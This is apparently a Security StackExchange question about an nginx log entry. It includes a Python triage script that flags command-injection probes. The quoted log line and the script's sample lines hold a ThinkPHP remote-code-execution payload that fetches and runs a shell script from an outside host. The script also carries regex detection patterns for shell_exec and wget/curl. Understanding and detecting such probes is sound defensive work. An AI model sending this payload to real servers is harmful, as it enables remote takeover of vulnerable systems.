
I have entries like this in my nginx log. If I read them correctly, someone is trying to call an index.php script that is trying to download some shell script, but I don't have any PHP on this server (at least not that I know of), and it seems the response code is 400.

```
112.239.175.156 - - [09/Oct/2022:04:05:30 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://135.148.104.21/w.sh -O w ; chmod 777 w ; ./w ; rm -rf w' HTTP/1.1" 400 150 "-" "-" "-"
```
schroeder
  • Does this answer your question? [Strange requests to web server](https://security.stackexchange.com/questions/40291/strange-requests-to-web-server), [Appropriate defense for 404s in my logs - persistent web scans from one region](https://security.stackexchange.com/questions/5301/appropriate-defense-for-404s-in-my-logs-persistent-web-scans-from-one-region). – Steffen Ullrich Oct 09 '22 at 09:29
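For triaging entries like the one in the question, the following is an added example, not part of the original post: it parses nginx access-log lines, decodes the `\xNN` escapes nginx writes, flags requests that carry PHP callback or command-execution parameters, and separates those the server rejected from those it answered with a success status. The indicator list, the verdict names and the sample lines (documentation-range IP addresses) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# nginx access-log prefix: client, identity, user, [time], "request", status, bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*?)" (?P<status>\d{3}) (?P<size>\d+|-)'
)
NGINX_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})')  # nginx logs some raw bytes as \xNN

# Hypothetical indicator set, modelled on the parameters seen in the question.
INDICATORS = {
    "php-callback": re.compile(r"call_user_func(_array)?|invokefunction", re.I),
    "command-exec": re.compile(r"shell_exec|passthru|proc_open|popen", re.I),
    "download-and-run": re.compile(r"\b(wget|curl)\b.*\bchmod\b", re.I),
}

# Constructed sample lines (not real traffic).
SAMPLE = [
    r'''192.0.2.10 - - [09/Oct/2022:04:05:30 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://198.51.100.7/w.sh -O w ; chmod 777 w ; ./w' HTTP/1.1" 400 150 "-" "-" "-"''',
    r'''203.0.113.5 - - [09/Oct/2022:04:06:02 +0000] "GET /index.php?function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=x HTTP/1.1" 200 512 "-" "-" "-"''',
    r'''192.0.2.44 - - [09/Oct/2022:04:07:11 +0000] "GET / HTTP/1.1" 200 615 "-" "Mozilla/5.0" "-"''',
]

def triage(line):
    """Return a dict describing one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Undo nginx \xNN escaping, then URL percent-encoding, before matching.
    raw = NGINX_ESC.sub(lambda h: chr(int(h.group(1), 16)), m["request"])
    request = unquote(raw)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(request))
    status = int(m["status"])
    if not hits:
        verdict = "benign"
    elif status >= 400:
        verdict = "probe-rejected"   # server refused the request
    else:
        verdict = "investigate"      # suspicious request got a success status
    return {"ip": m["ip"], "status": status, "hits": hits, "verdict": verdict}

if __name__ == "__main__":
    for entry in SAMPLE:
        print(triage(entry))
```
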

0 Answers